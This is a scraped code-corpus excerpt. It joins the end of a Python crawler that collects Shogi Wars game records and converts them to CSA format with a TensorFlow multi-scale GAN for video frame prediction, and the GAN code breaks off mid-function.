sec = len(url_list) * self.INTERVAL_TIME
finish_time = dt.datetime.now() + dt.timedelta(seconds=sec)
        # Show progress information
        print('{0} kifu records to fetch'.format(len(url_list)))
        print('Estimated finish time of kifu collection: {0}'.format(finish_time))
sys.stdout.flush()
df = pd.DataFrame()
for _url in url_list:
kifu = self.get_kifu(_url)
df = df.append(kifu, ignore_index=True)
df_crawled.loc[df_crawled.url == _url, 'crawled'] = 1
df_crawled.to_csv(csvpath, index=False)
if not df.empty:
df.to_sql('kifu', self.con, index=False, if_exists='append')
return df
else:
return None
def get_users(self, title, max_page=10):
        '''Fetch the ids of the top-ranked users of the given tournament.
Examples
----------
        Fetch the ids of the users participating in the 4th Shogi Wars Meijin tournament.
>>> wcrawler.get_users('meijin4', max_page=100)
'''
page = 0
url = 'http://shogiwars.heroz.jp/events/{title}?start={page}'
results = []
while page < max_page:
_url = url.format(title=title, page=page)
print(_url)
sys.stdout.flush()
html = self.get_html(_url)
_users = re.findall(r'\/users\/(\w+)', html)
            # Append when _users is non-empty; otherwise stop paging
if _users:
results.extend(_users)
page += 25
else:
break
return results
def get_kifu_url(self, users, gtype, csvpath,
max_iter=10, if_exists='append'):
        '''Fetch kifu urls for the given user names and gtype.
        Args
        ----------
        users: list of string
            User names
        gtype: string
            gtype ('', 'sb' or 's1'; see gtype_dict)
        csvpath: string
            Path to the CSV file in which the kifu urls are saved
        max_iter: int, optional (default=10)
            Maximum number of urls fetched per user
        '''
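        # Sketch of a typical call (user ids and path are hypothetical):
        # get_kifu_url(['user_a', 'user_b'], gtype='sb', csvpath='urls_3m.csv',
        # max_iter=50) collects up to roughly 50 3-minute kifu urls per user
        # and appends them to the CSV (if_exists='append').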
url_list = []
print('\ngtype:{0}, max_iter:{1}\n'.format(gtype, max_iter))
for _user in users:
print(_user)
_url_list = self.get_url(_user, gtype=gtype, max_iter=max_iter)
url_list.extend(_url_list)
if not url_list:
return None
df = pd.DataFrame(url_list)
df.ix[:, 1] = 0
df.columns = ['url', 'crawled']
if os.path.exists(csvpath) and if_exists == 'append':
df_before = pd.read_csv(csvpath, index_col=0)
df = pd.concat([df_before, df], axis=0, ignore_index=True)
df.to_csv(csvpath)
return df
def wcsa_to_csa(self, d):
        '''Convert the Shogi Wars flavour of the CSA format into standard CSA.
        Args
        ----------
        d: dict
            Kifu record as returned by get_kifu(); the fields used here are
            'wcsa' (the Wars-specific CSA string), 'gtype', 'user0', 'user1'
            and 'datetime'.
        '''
wcsa_list = re.split(r'[,\t]', d['wcsa'])
time_up = ['\tGOTE_WIN_TIMEOUT',
'\tGOTE_WIN_DISCONNECT',
'\tGOTE_WIN_TORYO']
if d['wcsa'] in time_up:
            # Timeout, disconnect or resignation before any move was played
return '%TIME_UP'
max_time, rule, time_limit = self.__gtype_to_rulestr(d['gtype'])
sente_prev_remain_time = max_time
gote_prev_remain_time = max_time
results = [
'\'バージョン', 'V2.2',
'\'対局者名', 'N+', d['user0'], 'N-', d['user1'],
'\'棋譜情報', '\'棋戦名', '$EVENT:', '将棋ウォーズ',
'\'対局場所', '$SITE:shogiwars.heroz.jp',
'\'開始日時',
'$START_TIME:' + d['datetime'].strftime('%Y/%m/%d %H:%M:%S'),
rule, time_limit,
'\'先手番', '+',
'\'指し手と消費時間'
]
for i, w in enumerate(wcsa_list):
if i % 2 == 0:
results.append(self.__extract_end_command(w))
else:
                # Process a time token
if (i - 1) % 4 == 0:
                    # Compute the first player's (sente) remaining time
sente_remain_time = int(w[1:])
_time = sente_prev_remain_time - sente_remain_time
sente_prev_remain_time = sente_remain_time
else:
                    # Compute the second player's (gote) remaining time
gote_remain_time = int(w[1:])
_time = gote_prev_remain_time - gote_remain_time
gote_prev_remain_time = gote_remain_time
results.append('T' + str(_time))
return '\n'.join(results)
def __gtype_to_rulestr(self, gtype):
if gtype == gtype_dict['10m']:
max_time = 60 * 10
rule = '\'持ち時間:10分、切れ負け'
time_limit = '$TIME_LIMIT:00:10+00'
elif gtype == gtype_dict['3m']:
max_time = 60 * 3
rule = '\'持ち時間:3分、切れ負け'
time_limit = '$TIME_LIMIT:00:03+00'
elif gtype == gtype_dict['10s']:
max_time = 3600
rule = '\'初手から10秒'
time_limit = '$TIME_LIMIT:00:00+10'
else:
            print('Error: invalid value for gtype; gtype={0}'.format(gtype))
max_time = None
rule = None
time_limit = None
return (max_time, rule, time_limit)
    @staticmethod
    def __extract_end_command(w):
        '''Process a move token or a special end-of-game command.
        CAUTION: the exact specification is unknown, so this may not cover every case.
'''
if w.find('TORYO') > 0 or w.find('DISCONNECT') > 0:
w_ap = '%TORYO'
elif w.find('TIMEOUT') > 0:
w_ap = '%TIME_UP'
elif w.find('DRAW_SENNICHI') > 0:
w_ap = '%SENNICHITE'
else:
w_ap = w
return w_ap
| mit | -3,913,733,935,031,709,000 | 26.858934 | 78 | 0.488241 | false |
kabrapratik28/DeepVideos | model/model_GAN.py | 1 | 38168 | import os
import sys
import shutil
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import init_ops
from tensorflow.contrib.layers.python.layers import regularizers
module_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")
if module_path not in sys.path:
sys.path.append(module_path)
from datasets.batch_generator import datasets
slim = tf.contrib.slim
tf.reset_default_graph()
trunc_normal = lambda stddev: init_ops.truncated_normal_initializer(0.0, stddev)
# Contants
image_channels = 3
time_frames_to_consider = 4
time_frames_to_predict = 4
interval=4 # frames to jump !
heigth_train= 64
width_train= 64
custom_test_size=[160,210]
heigth_test, width_test = custom_test_size
#===================================================================
# Generative Model Parameters
#===================================================================
# +1 for input from previous layer !
scale_level_feature_maps= [[128, 256, 128, 3],
[128, 256, 128, 3],
[128, 256, 512, 256, 128, 3],
[128, 256, 512, 256, 128, 3]]
# as size of image increase in scaling ... conv layer increases !
scale_level_kernel_size = [
[3, 3, 3, 3],
[5, 3, 3, 5],
[5, 3, 3, 3, 3, 5],
[7, 5, 5, 5, 5, 7]
]
#===================================================================
# Descriminative Model Parameters
#===================================================================
disc_scale_level_feature_maps = [[64],
[64, 128, 128],
[128, 256, 256],
[128, 256, 512, 128]]
# kernel sizes for each convolution of each scale network in the discriminator model
disc_scale_level_kernel_size = [[3],
[3, 3, 3],
[5, 5, 5],
[7, 7, 5, 5]]
# layer sizes for each fully-connected layer of each scale network in the discriminator model
# layer connecting conv to fully-connected is dynamically generated when creating the model
disc_fc_layer_units = [[512, 256, 1],
[1024, 512, 1],
[1024, 512, 1],
[1024, 512, 1]]
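# For scale i of the discriminator, disc_scale_level_feature_maps[i] and
# disc_scale_level_kernel_size[i] are zipped into one conv layer per entry,
# the conv output is flattened, and disc_fc_layer_units[i] lists the sizes of
# the fully-connected layers that follow; the final unit (1, with a sigmoid)
# is the real/fake score (see ScaleBasedDiscriminator.create_graph below).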
#===================================================================
# regularizer !
l2_val = 0.00005
# Adam optimizer !
adam_learning_rate = 0.0004
# Tensorboard images to show
batch_size = 8
number_of_images_to_show = 4
assert number_of_images_to_show <= batch_size, "images to show should be less !"
timesteps=16
file_path = os.path.abspath(os.path.dirname(__file__))
data_folder = os.path.join(file_path, "../../data/")
log_dir_file_path = os.path.join(file_path, "../../logs/")
model_save_file_path = os.path.join(file_path, "../../checkpoint/")
output_video_save_file_path = os.path.join(file_path, "../../output/")
iterations = "iterations/"
best = "best/"
checkpoint_iterations = 100
best_model_iterations = 100
test_model_iterations = 5
best_loss = float("inf")
heigth, width = heigth_train, width_train
channels = 3
assert timesteps>=time_frames_to_consider and timesteps>=time_frames_to_predict, "time steps must be greater !"
#==================== COPIED CODE ===============================================
#
# TENSORBOARD VISUALIZATION FOR SHARPNESS AND (Peak Signal to Noise Ratio){PSNR}
#=================================================================================
def log10(t):
"""
Calculates the base-10 log of each element in t.
@param t: The tensor from which to calculate the base-10 log.
@return: A tensor with the base-10 log of each element in t.
"""
numerator = tf.log(t)
denominator = tf.log(tf.constant(10, dtype=numerator.dtype))
return numerator / denominator
def psnr_error(gen_frames, gt_frames):
"""
Computes the Peak Signal to Noise Ratio error between the generated images and the ground
truth images.
@param gen_frames: A tensor of shape [batch_size, height, width, 3]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, height, width, 3]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The mean Peak Signal to Noise Ratio error over each frame in the
batch.
"""
shape = tf.shape(gen_frames)
num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])
square_diff = tf.square(gt_frames - gen_frames)
batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(square_diff, [1, 2, 3])))
return tf.reduce_mean(batch_errors)
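# Written out, this is the standard PSNR with a peak value of 1 (frames are
# assumed to be scaled to [0, 1]), averaged over the batch:
#     PSNR = 10 * log10(1 / MSE),  MSE = (1/N) * sum((gt - gen)^2)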
def sharp_diff_error(gen_frames, gt_frames):
"""
Computes the Sharpness Difference error between the generated images and the ground truth
images.
@param gen_frames: A tensor of shape [batch_size, height, width, 3]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, height, width, 3]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The Sharpness Difference error over each frame in the batch.
"""
shape = tf.shape(gen_frames)
num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])
# gradient difference
# create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.
# TODO: Could this be simplified with one filter [[-1, 2], [0, -1]]?
pos = tf.constant(np.identity(3), dtype=tf.float32)
neg = -1 * pos
filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]
filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]
strides = [1, 1, 1, 1] # stride of (1, 1)
padding = 'SAME'
gen_dx = tf.abs(tf.nn.conv2d(gen_frames, filter_x, strides, padding=padding))
gen_dy = tf.abs(tf.nn.conv2d(gen_frames, filter_y, strides, padding=padding))
gt_dx = tf.abs(tf.nn.conv2d(gt_frames, filter_x, strides, padding=padding))
gt_dy = tf.abs(tf.nn.conv2d(gt_frames, filter_y, strides, padding=padding))
gen_grad_sum = gen_dx + gen_dy
gt_grad_sum = gt_dx + gt_dy
grad_diff = tf.abs(gt_grad_sum - gen_grad_sum)
batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(grad_diff, [1, 2, 3])))
return tf.reduce_mean(batch_errors)
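# Equivalent formula (per frame, then averaged over the batch), where gx, gy
# denote the absolute horizontal/vertical finite differences computed above:
#     SharpDiff = 10 * log10(1 / ((1/N) * sum(|(gx_gt + gy_gt) - (gx_gen + gy_gen)|)))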
## =================== COPIED CODE ENDS ======================
def l2_loss(generated_frames, expected_frames):
losses = []
for each_scale_gen_frames, each_scale_exp_frames in zip(generated_frames, expected_frames):
losses.append(tf.nn.l2_loss(tf.subtract(each_scale_gen_frames, each_scale_exp_frames)))
loss = tf.reduce_mean(tf.stack(losses))
return loss
def gdl_loss(generated_frames, expected_frames, alpha=2):
"""
difference with side pixel and below pixel
"""
scale_losses = []
for i in xrange(len(generated_frames)):
# create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.
pos = tf.constant(np.identity(3), dtype=tf.float32)
neg = -1 * pos
filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]
filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]
strides = [1, 1, 1, 1] # stride of (1, 1)
padding = 'SAME'
gen_dx = tf.abs(tf.nn.conv2d(generated_frames[i], filter_x, strides, padding=padding))
gen_dy = tf.abs(tf.nn.conv2d(generated_frames[i], filter_y, strides, padding=padding))
gt_dx = tf.abs(tf.nn.conv2d(expected_frames[i], filter_x, strides, padding=padding))
gt_dy = tf.abs(tf.nn.conv2d(expected_frames[i], filter_y, strides, padding=padding))
grad_diff_x = tf.abs(gt_dx - gen_dx)
grad_diff_y = tf.abs(gt_dy - gen_dy)
scale_losses.append(tf.reduce_sum((grad_diff_x ** alpha + grad_diff_y ** alpha)))
# condense into one tensor and avg
return tf.reduce_mean(tf.stack(scale_losses))
def total_loss(generated_frames, expected_frames, loss_from_disc, lambda_gdl=1.0, lambda_l2=1.0, lambda_disc=1.0):
total_loss_cal = (lambda_gdl * gdl_loss(generated_frames, expected_frames) +
lambda_l2 * l2_loss(generated_frames, expected_frames)+
lambda_disc * loss_from_disc)
return total_loss_cal
#===================================================================
# Discriminator Model
#===================================================================
class ScaleBasedDiscriminator:
def __init__(self, heigth, width, kernel_size, feature_maps, fc_layer_units, scale_number):
assert len(feature_maps)==len(kernel_size), "Length should be equal !"
self.heigth = heigth
self.width = width
self.kernel_size = kernel_size
self.feature_maps = feature_maps
self.fc_layer_units = fc_layer_units
self.scale_number = scale_number
self.input = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth, self.width, image_channels])
self.create_graph()
def create_graph(self):
predication = self.input
with tf.variable_scope('discriminator_scale_'+str(self.scale_number)):
conv_counter = 0
for index, (each_filter, each_kernel) in enumerate(zip(self.feature_maps, self.kernel_size)):
with tf.variable_scope('conv_'+str(conv_counter)):
conv_counter += 1
stride = 1
# last layer stride 2 ... fc layer weights reduce ...
if index == (len(self.feature_maps)-1):
stride = 2
predication = slim.conv2d(predication, each_filter, [each_kernel, each_kernel],
padding = 'VALID',
stride = stride,
weights_initializer=trunc_normal(0.01),
weights_regularizer=regularizers.l2_regularizer(l2_val))
# print predication
predication = slim.flatten(predication)
# print predication
fully_connected_counter = 0
for index, each_layer_units in enumerate(self.fc_layer_units):
with tf.variable_scope('fully_connected'+str(fully_connected_counter)):
fully_connected_counter += 1
activation = tf.nn.relu
# last layer sigmoid !
if index == (len(self.fc_layer_units)-1):
activation = tf.nn.sigmoid
predication = slim.fully_connected(predication, each_layer_units, activation_fn=activation)
# print predication
# clip value between 0.1 and 0.9
self.predication = tf.clip_by_value(predication, 0.1, 0.9)
class Discriminator:
def __init__(self, heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units):
assert len(disc_scale_level_feature_maps)==len(disc_scale_level_kernel_size), "Length should be equal !"
assert len(disc_scale_level_feature_maps)==len(disc_fc_layer_units), "Length should be equal !"
self.heigth = heigth
self.width = width
self.disc_scale_level_feature_maps = disc_scale_level_feature_maps
self.disc_scale_level_kernel_size = disc_scale_level_kernel_size
self.disc_fc_layer_units = disc_fc_layer_units
# ground truth image
self.ground_truth_images = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth, self.width, image_channels])
# real or fake
self.ground_truth_labels = tf.placeholder(dtype=tf.float32, shape=[None,1])
self.len_scale = len(self.disc_scale_level_kernel_size)
self.create_graph()
self.loss()
self.scale_images_ground_truth_for_inputs()
self.tf_summary()
def create_graph(self,):
self.scale_based_discriminators = []
for each_scale, (each_feature_map, each_kernel_size, each_fc_layer) in enumerate(zip(self.disc_scale_level_feature_maps, self.disc_scale_level_kernel_size, self.disc_fc_layer_units)):
# scaling create [1/64, 1/32, 1/16, 1/4]
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
rescaled_heigth = int(scaling_factor * self.heigth)
rescaled_width = int(scaling_factor * self.width)
disc_at_scale = ScaleBasedDiscriminator(heigth=rescaled_heigth,
width=rescaled_width, kernel_size=each_kernel_size,
feature_maps=each_feature_map,
fc_layer_units=each_fc_layer, scale_number=each_scale)
self.scale_based_discriminators.append(disc_at_scale)
self.scaled_disc_predication = []
for each_scaled_pred in self.scale_based_discriminators:
self.scaled_disc_predication.append(each_scaled_pred.predication)
# print self.scaled_disc_predication
def loss(self):
total_loss = []
for each_scaled_op in self.scaled_disc_predication:
# print each_scaled_op, self.ground_truth_labels
curr_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=self.ground_truth_labels, logits=each_scaled_op)
total_loss.append(curr_loss)
self.dis_loss = tf.reduce_mean(tf.stack(total_loss))
self.optimizer = tf.train.AdamOptimizer(adam_learning_rate)
global_step = tf.Variable(0,name="dis_global_step_var",trainable=False)
self.step = self.optimizer.minimize(self.dis_loss, global_step=global_step)
def rescale_image(self, scaling_factor, heigth, width, ground_truths):
"""
scaling_factor, heigth, width = values
input_data, ground_truths = Tensors
"""
rescaled_heigth = int(scaling_factor * heigth)
rescaled_width = int(scaling_factor * width)
assert rescaled_heigth != 0 and rescaled_width != 0, "scaling factor should not be zero !"
ground_truths_reshaped = tf.image.resize_images(ground_truths, [rescaled_heigth, rescaled_width])
return ground_truths_reshaped
def scale_images_ground_truth_for_inputs(self,):
inputs = []
for each_scale in range(self.len_scale):
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
inputs.append(self.rescale_image(scaling_factor, self.heigth, self.width, self.ground_truth_images))
self.rescaled_ground_truth_images = inputs
# print inputs
def tf_summary(self):
train_loss = tf.summary.scalar("dis_train_loss", self.dis_loss)
self.train_summary_merged = tf.summary.merge([train_loss])
#===================================================================
# Generative Model
#===================================================================
class GenerativeNetwork:
def __init__(self, heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size):
self.heigth_train = heigth_train
self.width_train = width_train
self.heigth_test = heigth_test
self.width_test = width_test
self.scale_level_feature_maps = scale_level_feature_maps
self.scale_level_kernel_size = scale_level_kernel_size
self.len_scale = len(self.scale_level_kernel_size)
assert len(self.scale_level_feature_maps) == len(self.scale_level_kernel_size), "Length should be equal !"
# Placeholders for inputs and outputs ... !
self.input_train = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_train, self.width_train, time_frames_to_consider * image_channels])
self.output_train = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_train, self.width_train, image_channels])
self.input_test = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_test, self.width_test, time_frames_to_consider * image_channels])
self.output_test = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_test, self.width_test, image_channels])
self.loss_from_disc = tf.placeholder(dtype=tf.float32, shape=[])
self.each_scale_predication_train = []
self.each_scale_ground_truth_train = []
self.each_scale_predication_test = []
self.each_scale_ground_truth_test = []
self.create_graph(self.input_train, self.output_train, heigth_train, width_train,
self.each_scale_predication_train,
self.each_scale_ground_truth_train,
reuse=None)
# reuse graph at time of test !
self.create_graph(self.input_test, self.output_test, heigth_test, width_test,
self.each_scale_predication_test,
self.each_scale_ground_truth_test,
reuse=True)
self.loss()
self.tf_summary()
# print self.each_scale_predication_train
# print self.each_scale_ground_truth_train
# print self.each_scale_predication_test
# print self.each_scale_ground_truth_test
def rescale_image(self, scaling_factor, heigth, width, input_data, ground_truths, last_generated_frame):
"""
scaling_factor, heigth, width = values
input_data, ground_truths = Tensors
"""
rescaled_heigth = int(scaling_factor * heigth)
rescaled_width = int(scaling_factor * width)
assert rescaled_heigth != 0 and rescaled_width != 0, "scaling factor should not be zero !"
input_reshaped = tf.image.resize_images(input_data, [rescaled_heigth, rescaled_width])
ground_truths_reshaped = tf.image.resize_images(ground_truths, [rescaled_heigth, rescaled_width])
last_generated_frame_reshaped = None
if last_generated_frame!=None:
last_generated_frame_reshaped = tf.image.resize_images(last_generated_frame, [rescaled_heigth, rescaled_width])
return (input_reshaped, ground_truths_reshaped, last_generated_frame_reshaped)
def create_graph(self, input_data, ground_truths, heigth, width,
predicated_at_each_scale_tensor, ground_truth_at_each_scale_tensor, reuse):
# for each scale ...
for each_scale in range(self.len_scale):
conv_counter = 0
with tf.variable_scope('scale_'+str(each_scale),reuse=reuse):
# scaling create [1/64, 1/32, 1/16, 1/4]
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
last_generated_frame = None
if each_scale > 0:
last_generated_frame = predicated_at_each_scale_tensor[each_scale-1]
input_reshaped, ground_truths_reshaped, last_generated_frame_reshaped = self.rescale_image(scaling_factor, heigth, width, input_data, ground_truths, last_generated_frame)
# append last scale output
if each_scale > 0:
input_reshaped = tf.concat([input_reshaped, last_generated_frame_reshaped],axis=3)
# print (input_reshaped, ground_truths_reshaped)
predication = input_reshaped
# for each conv layers in that scale ...
feature_maps = scale_level_feature_maps[each_scale]
kernel_size = scale_level_kernel_size[each_scale]
assert len(feature_maps)==len(kernel_size), "Length should be equal !"
for index, (each_filter, each_kernel) in enumerate(zip(feature_maps, kernel_size)):
with tf.variable_scope('conv_'+str(conv_counter),reuse=reuse):
conv_counter += 1
activiation = tf.nn.relu
# last layer tanh !
if index==(len(kernel_size)-1):
activiation = tf.nn.tanh
predication = slim.conv2d(predication, each_filter, [each_kernel, each_kernel],
weights_initializer=trunc_normal(0.01),
weights_regularizer=regularizers.l2_regularizer(l2_val),
activation_fn=activiation)
# APPEND LAST GENERATED FRAME
predicated_at_each_scale_tensor.append(predication)
ground_truth_at_each_scale_tensor.append(ground_truths_reshaped)
def loss(self):
# discriminator, gdl and l2 loss !
self.combined_loss = total_loss(self.each_scale_predication_train, self.each_scale_ground_truth_train, self.loss_from_disc)
self.optimizer = tf.train.AdamOptimizer(adam_learning_rate)
global_step = tf.Variable(0,name="global_step_var",trainable=False)
self.step = self.optimizer.minimize(self.combined_loss, global_step=global_step)
def tf_summary(self):
train_loss = tf.summary.scalar("gen_train_loss", self.combined_loss)
val_loss = tf.summary.scalar("gen_val_loss", self.combined_loss)
with tf.variable_scope('image_measures'):
psnr_error_train = psnr_error(self.each_scale_predication_train[-1], self.output_train)
psnr_error_train_s = tf.summary.scalar("train_psnr",psnr_error_train)
psnr_error_val_s = tf.summary.scalar("val_psnr",psnr_error_train)
sharpdiff_error_train = sharp_diff_error(self.each_scale_predication_train[-1],self.output_train)
sharpdiff_error_train_s = tf.summary.scalar("train_shardiff",sharpdiff_error_train)
sharpdiff_error_val_s = tf.summary.scalar("val_shardiff",sharpdiff_error_train)
images_to_show_train = []
images_to_show_val = []
len_pred = len(self.each_scale_predication_train)
for index_scale in range(len_pred-2,len_pred):
images_to_show_train.append(tf.summary.image('train_output_scale_' + str(index_scale), self.each_scale_predication_train[index_scale],
number_of_images_to_show))
images_to_show_train.append(tf.summary.image('train_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_train[index_scale],
number_of_images_to_show))
images_to_show_val.append(tf.summary.image('val_output_scale_' + str(index_scale), self.each_scale_predication_train[index_scale],
number_of_images_to_show))
images_to_show_val.append(tf.summary.image('val_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_train[index_scale],
number_of_images_to_show))
psnr_error_test = psnr_error(self.each_scale_predication_test[-1], self.output_test)
psnr_error_test_s = tf.summary.scalar("test_psnr",psnr_error_test)
sharpdiff_error_test = sharp_diff_error(self.each_scale_predication_test[-1],self.output_test)
sharpdiff_error_test_s = tf.summary.scalar("test_shardiff",sharpdiff_error_test)
images_to_show_test = []
len_pred = len(self.each_scale_predication_test)
for index_scale in range(len_pred-2,len_pred):
images_to_show_test.append(tf.summary.image('test_output_scale_' + str(index_scale), self.each_scale_predication_test[index_scale],
number_of_images_to_show))
images_to_show_test.append(tf.summary.image('test_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_test[index_scale],
number_of_images_to_show))
self.train_summary_merged = tf.summary.merge([train_loss, psnr_error_train_s, sharpdiff_error_train_s]+images_to_show_train)
self.test_summary_merged = tf.summary.merge([psnr_error_test_s, sharpdiff_error_test_s]+images_to_show_test)
self.val_summary_merged = tf.summary.merge([val_loss, psnr_error_val_s, sharpdiff_error_val_s]+images_to_show_val)
# ======================== MODEL ENDS ========================
def log_directory_creation(sess):
if tf.gfile.Exists(log_dir_file_path):
tf.gfile.DeleteRecursively(log_dir_file_path)
tf.gfile.MakeDirs(log_dir_file_path)
# model save directory
if os.path.exists(model_save_file_path):
x_folder = iterations
print ("loading model from ",x_folder)
restore_model_session(sess, x_folder + "gan_model")
else:
os.makedirs(model_save_file_path + iterations)
os.makedirs(model_save_file_path + best)
# output dir creation
if not os.path.exists(output_video_save_file_path):
os.makedirs(output_video_save_file_path)
def save_model_session(sess, file_name):
saver = tf.train.Saver()
save_path = saver.save(sess, model_save_file_path + file_name)
def restore_model_session(sess, file_name):
saver = tf.train.Saver() # tf.train.import_meta_graph(model_save_file_path + file_name + ".meta")
saver.restore(sess, model_save_file_path + file_name)
print ("graph loaded!")
def is_correct_batch_shape(X_batch, y_batch, info="train",heigth=heigth, width=width):
# info can be {"train", "val"}
if (X_batch is None or y_batch is None or
X_batch.shape[1:] != (timesteps, heigth, width, channels) or
y_batch.shape[1:] != (timesteps, heigth, width, channels)):
print ("Warning: skipping this " + info + " batch because of shape")
return False
return True
def images_to_channels(X_batch):
"""
This utility convert (Batch Size, TimeSteps, H, W, C) => (Batch Size, H, W, C, TimeSteps) => (Batch Size, H, W, C * TimeSteps)
Refer Input of Mutli Scale Architecture !
"""
input_data = X_batch.transpose(0,2,3,4,1)
input_data = input_data.reshape(list(input_data.shape[:-2])+[-1])
return input_data
def remove_oldest_image_add_new_image(X_batch,y_batch):
"""
While frame predications each time step remove oldest image and newest image
"""
removed_older_image = X_batch[:,:,:,channels:]
new_batch = np.append(removed_older_image, y_batch, axis=3)
return new_batch
def alternate_disc_gen_training(sess, disc_model, gen_model, input_train, output_train):
# get scaled input on ground truth image !
rescaled_ground_truth_images = sess.run(disc_model.rescaled_ground_truth_images, feed_dict={disc_model.ground_truth_images: output_train})
new_feed_dict = {}
for i in range(len(rescaled_ground_truth_images)):
new_feed_dict [ disc_model.scale_based_discriminators[i].input ] = rescaled_ground_truth_images[i]
# real images !
new_feed_dict[disc_model.ground_truth_labels] = np.ones([len(input_train),1])
# disc train on real data
_, disc_summary_real = sess.run([disc_model.step, disc_model.train_summary_merged] ,feed_dict=new_feed_dict)
# gen predict on real data => predicated
each_scale_predication_train = sess.run(gen_model.each_scale_predication_train, feed_dict={gen_model.input_train : input_train, gen_model.output_train : output_train})
new_feed_dict = {}
for i in range(len(each_scale_predication_train)):
new_feed_dict [ disc_model.scale_based_discriminators[i].input ] = each_scale_predication_train[i]
# fake images !
new_feed_dict[disc_model.ground_truth_labels] = np.zeros([len(input_train),1])
# disc train on predicated by gen
_, disc_summary_fake, dis_loss = sess.run([disc_model.step, disc_model.train_summary_merged, disc_model.dis_loss] ,feed_dict=new_feed_dict)
# gen take loss from disc and train
_, gen_summary = sess.run([gen_model.step, gen_model.train_summary_merged], feed_dict={gen_model.loss_from_disc : dis_loss,
gen_model.input_train : input_train,
gen_model.output_train : output_train
})
return (disc_summary_real, disc_summary_fake, gen_summary)
def validation(sess, gen_model, data, val_writer, val_step):
loss = []
for X_batch, y_batch, _ in data.val_next_batch():
if not is_correct_batch_shape(X_batch, y_batch, "val"):
print ("validation batch is skipping ... ")
continue
X_input = X_batch[:,:time_frames_to_consider]
X_input = images_to_channels(X_input)
# ground truth ... for loss calculation ... !
output_train = X_batch[:,time_frames_to_consider,:,:,:]
Y_output = np.zeros((len(X_input),time_frames_to_predict,heigth,width,channels))
for each_time_step in range(time_frames_to_predict):
# gen predict on real data => predicated
y_current_step, combined_loss, train_summary_merged = sess.run([gen_model.each_scale_predication_train[-1], gen_model.combined_loss,gen_model.val_summary_merged], feed_dict={gen_model.loss_from_disc : 0.0,
gen_model.input_train : X_input,
gen_model.output_train : output_train})
loss.append(combined_loss)
val_writer.add_summary(train_summary_merged, val_step)
val_step += 1
Y_output[:,each_time_step,:,:,:] = y_current_step
X_input = remove_oldest_image_add_new_image(X_input,y_current_step)
output_train = X_batch[:,time_frames_to_predict+each_time_step+1,:,:,:]
if len(loss)==0:
return (val_step, float("inf"))
return (val_step, sum(loss)/float(len(loss)))
def test(sess, gen_model, data, test_writer, test_step, is_store_output=False):
for X_batch, y_batch, file_names in data.get_custom_test_data():
if not is_correct_batch_shape(X_batch, y_batch, "test",heigth=custom_test_size[0], width=custom_test_size[1]):
print ("test batch is skipping ... ")
continue
X_input = X_batch[:,:time_frames_to_consider]
X_input = images_to_channels(X_input)
# ground truth ... for loss calculation ... !
output_train = X_batch[:,time_frames_to_consider,:,:,:]
# store output ...
Y_output = np.zeros((len(X_batch),time_frames_to_predict,custom_test_size[0],custom_test_size[1],channels))
for each_time_step in range(time_frames_to_predict):
# gen predict on real data => predicated
y_current_step, test_summary_merged = sess.run([gen_model.each_scale_predication_test[-1], gen_model.test_summary_merged], feed_dict={gen_model.loss_from_disc : 0.0,
gen_model.input_test : X_input,
gen_model.output_test : output_train})
test_writer.add_summary(test_summary_merged, test_step)
test_step += 1
Y_output[:,each_time_step,:,:,:] = y_current_step
X_input = remove_oldest_image_add_new_image(X_input,y_current_step)
output_train = X_batch[:,time_frames_to_predict+each_time_step+1,:,:,:]
if is_store_output:
# save with filnames
expected_frames = X_batch[:,time_frames_to_consider:time_frames_to_consider+time_frames_to_predict,:,:,:]
# image post processing is happening inside of store ...
# store
store_file_names_gen = data.frame_ext.generate_output_video(Y_output, file_names, ext_add_to_file_name="_generated_large")
store_file_names_exp = data.frame_ext.generate_output_video(expected_frames, file_names, ext_add_to_file_name="_expected_large")
speed = 1
data.frame_ext.generate_gif_videos(store_file_names_gen,speed=speed)
data.frame_ext.generate_gif_videos(store_file_names_exp,speed=speed)
return test_step
def test_wrapper():
with tf.Session() as sess:
disc_model = Discriminator(heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units)
gen_model = GenerativeNetwork(heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
sess.run(init)
# clear logs !
log_directory_creation(sess)
# summary !
gen_train_writer = tf.summary.FileWriter(log_dir_file_path + "gen_train", sess.graph)
des_train_writer = tf.summary.FileWriter(log_dir_file_path + "des_train", sess.graph)
test_writer = tf.summary.FileWriter(log_dir_file_path + "test", sess.graph)
val_writer = tf.summary.FileWriter(log_dir_file_path + "val", sess.graph)
global_step = 0
gen_count_iter = 0
